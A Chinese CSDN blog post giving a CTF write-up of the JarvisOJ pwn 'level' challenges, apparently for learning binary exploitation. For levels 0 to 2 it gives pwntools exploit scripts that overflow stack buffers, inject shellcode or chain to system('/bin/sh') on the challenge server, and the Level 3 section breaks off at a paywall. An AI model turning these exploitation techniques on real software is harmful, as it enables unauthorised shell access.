Jarvisoj_WP

最新推荐文章于 2024-02-04 15:44:30 发布
最新推荐文章于 2024-02-04 15:44:30 发布
阅读量391 收藏 1
点赞数
分类专栏: pwn 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49914719/article/details/114639021
版权

文章目录

JarvisOJ - Level 0

题目链接
类型:ret2text


先把文件拖进虚拟机,64位ELF文件,只开启了NX保护

在这里插入图片描述

用IDA反编译,main函数会调用vulnerable_function,另外程序里还有一个callsystem()
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Vulnerable_function里的read()可以读取0x200个字节,但只有0x80的内存
在这里插入图片描述
所以打算通过read()覆盖返回地址,跳转到callsystem.查看callsystem的地址
在这里插入图片描述

EXP

在这里插入图片描述


JarvisOJ - Level 1

题目链接
类型:ret2shellcode


这次拿到的是32位

int __cdecl main(int argc, const char **argv, const char **envp)
{
   
  vulnerable_function();
  write(1, "Hello, World!\n", 0xEu);
  return 0;
}

ssize_t vulnerable_function()
{
   
  char buf; // [sp+0h] [bp-88h]@1

  printf("What's this:%p?\n", &buf);
  return read(0, &buf, 0x100u);
}

buf大小为0x88,于是想把一段shellcode写在buf上,然后使返回地址指向buf


EXP
#-*- coding: utf-8 -*-
from pwn import *

p = remote('pwn2.jarvisoj.com', 9877)
#p = process("./level1")

text = p.recvline()[14:-2]
print text[14:-2]

buf_addr = int(text, 16)
shellcode = asm(shellcraft.sh())	#生成一段shellcode并转化成字符串

payload = 'a' * (0x88+4-len(shellcode)) + shellcode +  p32(buf_addr)	#先填a再填shellcode
p.send(payload)
p.interactive()

成功得到flag


JarvisOJ - Level 2

题目链接
类型:ret2syscall


这次的vulnerable_function()是这样的,buf大小为0x88
在这里插入图片描述

在程序里找到system函数和/bin/sh字符串,得到地址
在这里插入图片描述
在这里插入图片描述


EXP
from pwn import * 

p = remote('pwn2.jarvisoj.com', 9878)
#p = process("./level2")

system_addr = 0x08048320
sh_addr = 0x0804A024

payload = 'a' * 0x88 + "bbbb" + p32(system_addr) + p32(0xdeadbeef) + p32(sh_addr)
p.sendlineafter("Input:\n", payload)
p.interactive()

返回地址指向system,buf返回地址的上方有另一个返回地址,为system函数执行后的返回地址,任意填充,后面再放上将system需要的参数&’/bin/sh’


JarvisOJ - Level 2_x64

题目链接
类型:ret2syscall


64位ret2syscall,代码与上一题32位一样,read()允许读入的容量比buf大得多,文件里也有system和"/bin/sh"
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

EXP
from pwn import* 

p = remote('pwn2.jarvisoj.com','9882')
#p = process("./level2_64") 
#elf = ELF('./level2_x64')

pop_rdi_addr = 0x00000000004006b3		#pop rdi
#sh_addr = elf.search('/bin/sh').next()
sh_addr = 0x0000000000600A90			#'/bin/sh'
#system_addr = elf.symbols['system']
system_addr = 0x0000000000400603		#system

payload = 'a' * 0x80 + "bbbbcccc" + p64(pop_rdi_addr) + p64(sh_addr) + p64(system_addr)
p.sendline(payload) 
p.interactive()

得到flag


JarvisOJ - Level 3

题目链接
类型:ret2libc


题目是32位NX保护,给了一个level3和一个libc文件。buf容量为0x88

int __cdecl main(int argc, const char **argv, const char **envp)
{
   
  vulnerable_function();
  write(1, "Hello, World!\n", 0xEu);
  return 0;
}

ssize_t vulnerable_function()
{
   
  char buf; // [sp+0h] [bp-88h]@1

  write(1, "Input:\n", 7u);
  return read(0, &buf, 0x100u
最低0.47元/天 解锁文章
Ph4ntom
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GlassFish_Enterprise_WP.rar_wp
09-19
java libro dwr java jspsdfsdfsdf
jarvis OJ
CHOOOU的博客
11-05 793
basic Baby’s Crack 程序大概就是打开一个命令行输入的 file,然后打开一个 tmp,对 file 加密写入 tmp,将 file 删除,将 tmp 重命名为 file。 直接在 ida 中 F5,关键的代码就是: while (feof(*(_QWORD *)&argc, argv, v8, v16) == 0)
buuctf ---- jarvisoj_level(全)
L0g1c的博客
01-22 3504
buuctf ----- jarvisoj_level0 运行一下程序 使用64位的IDA查看程序 查看vulner_function函数 发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞 发现后门函数system("/bin/sh"),解题思路:修改read函数的ret address 为后门函数的地址。 编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa
jarvisoj_level21解题
最新发布
2301_81504456的博客
02-04 389
没有调用先前指令system函数的情况下,在执行完函数后需要一个数据作为system的返回地址。
jarvisoj_level
m0_75234353的博客
05-09 135
这题和前面最大的不同就是x64,就意味着参数调用方式的不同。不再是像32位一样,把参数压入栈中。而是先压入指定寄存器,第七个以后的再按逆序压入栈。
Jarvis OJ (逆向):软件密码破解-1
s0il的博客
09-13 725
题目: 看到别人的wp都说有壳,不知道为什么我的PEid查不出来壳的具体种类,运行程序,输入错误则退出。 IDA中,函数有几百个一个一个找核心函数肯定不现实,OD动态调试,找到 “你赢了”: 向上翻,找到函数的开头CB1BB0 向下翻,找到5个集中跳转: 既然题目是密码破解,肯定是和加密算法有关的,所以要分析一下这5个jnz上面的具体操作:...
WP.rar_phone_windows phone_wp
09-14
2012年10月31日,Windows Phone 8.0手机开发培训讲义,包括课件和源码!
Wp.rar_wp
09-14
简单实用的butterworth滤波器设计,很好用
example_wp_log_peyton_manning.csv
03-17
Prophet的自带数据集。Facebook开源。 在官网可以下载到。https://github.com/facebook/prophet/blob/master/examples/example_wp_log_peyton_manning.csv
wp7--.rar_WP7_wp889.com::_wp889com_wp932_位置服务
09-23
WP7系统的一个基于位置的服务应用程序,可以查看地图,分享位置,并具有社交功能
jarvisoj_level0
weixin_56301399的博客
07-21 566
在Functionswindow可以看到有一个callsystem()函数,按F5反汇编可以看到这是一个系统调用,且callsystem()函数的起始地址为0x400596。双击vulnerable_function()函数可以看到buf的长度只有0x80,即可用栈大小只有108字节,但是read()并没有限制输入,显然存在栈溢出漏洞。buf需覆盖0x80个字节覆盖,再加上rbp的0x8个字节,最后加上callsystem()函数的起始地址0x400596构成payload。信息就了解他是64位即可。...
Jarvisoj刷题笔记(CTF Basic题)
Arthur_WangYu的博客
10-01 570
某天A君的网站被日,管理员密码被改,死活登不上,去数据库一看,啥,这密码md5不是和原来一样吗?为啥登不上咧?d78b6f302l25cdc811adfe8d4e7c9fd34 请提交PCTF{原来的管理员密码}
无保护栈 | 基本ROP(更新中)
Ph4ntom的一亩三分地
12-25 192
无保护栈 | 基本ROP ROP主要是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而改变指令流的执行顺序。 如果一个程序能够向栈上写入数据,并且写入的数据大小没有被良好地控制,那么这个程序就有可能存在栈溢出漏洞。 比如,在一份只开启NX保护的ELF文件中有下面的代码: int __cdecl main(int argc, const char **argv, const char **envp) { write(1, "Hello, World\n
jarvis oj_用一种态度来构建Jarvis,生成式聊天机器人
weixin_26632369的博客
07-20 1151
jarvis ojCarsales.com, the company I work for, is holding a hackathon event. This is an annual event where everyone (tech or non tech) comes together to form a team and build anything — anything at al...
Jarvis OJ pwn wp - level 0 ~ level 5
fa1c4的blog
07-03 288
level 0 溢出, ROP调用system("/bin/sh"), get shell from pwn import * from pwnlib.util.cyclic import cyclic sel = 1 filename = "./level0" URL, PORT = "pwn2.jarvisoj.com", 9881 io = process(filename) if sel == 0 else remote(URL, PORT) elf = ELF(filename) sy
JarvisOJ Web&Reverse&Pwn
热门推荐
4ct10n
11-16 5万+
Web 0x01 phpinfo 0x02 WEB 0x03 Easy Gallery 0x04 Login 0x05 PORT51 0x06 LOCALHOST 0x07 神盾局的秘密 0x08 IN A Mess 0x09 api调用 0x0a Simple Injection 0x0b 图片上传漏洞 0x0c chopper 0x0b flag在管理员手里 Reverse 0x01FindK
jarvisoj的pwn中level系列wp
Huiuyao的博客
12-09 2789
由于最近攻防世界的动态环境又崩了,因此找到了jarvisoj这么个oj,网站地址如下 [jarvisoj](https://www.jarvisoj.com/) 其中会有rank与题目数,其中的pwn有个level系列网上还挺火的,因此就顺便做了一下,主要是解决一些可能新手不理解的部分。 ## level1 ...
JarvisOJ-You-Need-Python-wp
Magic1an的博客
08-19 1032
人生苦短我用Python。感谢: http://blog.csdn.net/cien_anos/article/details/70160614题目给了两个文件flag.py和key_is_here_but_do_you_know_rfc4042marshal.loads(zlib.decompress(base64.b64decode('eJxtVP9r21YQvyd/ieWm66Cd03QM1
(Jarvis Oj)(Pwn) Smashes
Nothing
06-14 2381
(Jarvis Oj)(Pwn) Smashes 查看保护。打开了栈保护。看上去有点麻烦。 再来分析下程序代码。如下是主要的函数体部分。 这个函数首先让我们输入name字符串,通过gets()函数,是有溢出的,但是在输入过长的字符串时程序会abort。 并且提示 ./smashes terminated 这里其实是ssp(Stack Smashing Protector)的提示...
EEPROM_WP_Pin
07-27
EEPROM_WP_Pin是一个常见的术语,它通常用于描述电子设备中的一个引脚或接口。EEPROM代表可擦写可编程只读存储器(Electrically Erasable Programmable Read-Only Memory),WP代表写保护(Write Protect)。因此,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值